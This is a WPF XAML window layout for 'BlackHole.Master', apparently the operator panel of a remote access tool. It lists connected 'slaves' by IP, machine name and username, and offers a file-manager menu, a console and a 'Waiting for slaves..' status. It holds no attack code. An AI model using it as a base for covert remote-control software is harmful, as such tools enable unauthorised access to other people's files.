BlackHole.Master/MainWindow.xaml

<Window x:Class="BlackHole.Master.MainWindow"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
        xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
        xmlns:local="clr-namespace:BlackHole.Master"
        mc:Ignorable="d"
        Title="MainWindow" Height="700" Width="1000">
    <Grid Background="Linen">
        <StackPanel>
            <ListView Name="SlavesList" ItemsSource="{Binding Items}"  Margin="10" Height="350" ScrollViewer.VerticalScrollBarVisibility="Visible">
                <ListView.View>
                    <GridView>
                        <GridViewColumn Header="Ip" Width="100" DisplayMemberBinding="{Binding Ip}" />
                        <GridViewColumn Header="Id" Width="100" DisplayMemberBinding="{Binding Id}" />
                        <GridViewColumn Header="OperatingSystem" Width="300" DisplayMemberBinding="{Binding OperatingSystem}" />
                        <GridViewColumn Header="MachineName" Width="150" DisplayMemberBinding="{Binding MachineName}" />
                        <GridViewColumn Header="UserName" Width="150" DisplayMemberBinding="{Binding UserName}" />
                    </GridView>
                </ListView.View>
                <ListView.ContextMenu>
                    <ContextMenu>
                        <MenuItem Header="FileManager" Click="OpenFileManager" Icon="{StaticResource FileManagerIcon}" />
                    </ContextMenu>
                </ListView.ContextMenu>
            </ListView>
            <RichTextBox Name="Console" Margin="10 0 10 0" IsReadOnly="True" Height="250" ScrollViewer.VerticalScrollBarVisibility="Visible" />
            <StatusBar Margin="10" BorderThickness="1" BorderBrush="Black" Background="White">
                <StatusBar.ItemsPanel>
                    <ItemsPanelTemplate>
                        <Grid>
                            <Grid.ColumnDefinitions>
                                <ColumnDefinition Width="Auto" />
                            </Grid.ColumnDefinitions>
                        </Grid>
                    </ItemsPanelTemplate>
                </StatusBar.ItemsPanel>
                <StatusBarItem Grid.Column="0">
                    <TextBlock Name="ListeningState" Text="Waiting for slaves.." />
                </StatusBarItem>
            </StatusBar>
        </StackPanel>
    </Grid>
</Window>
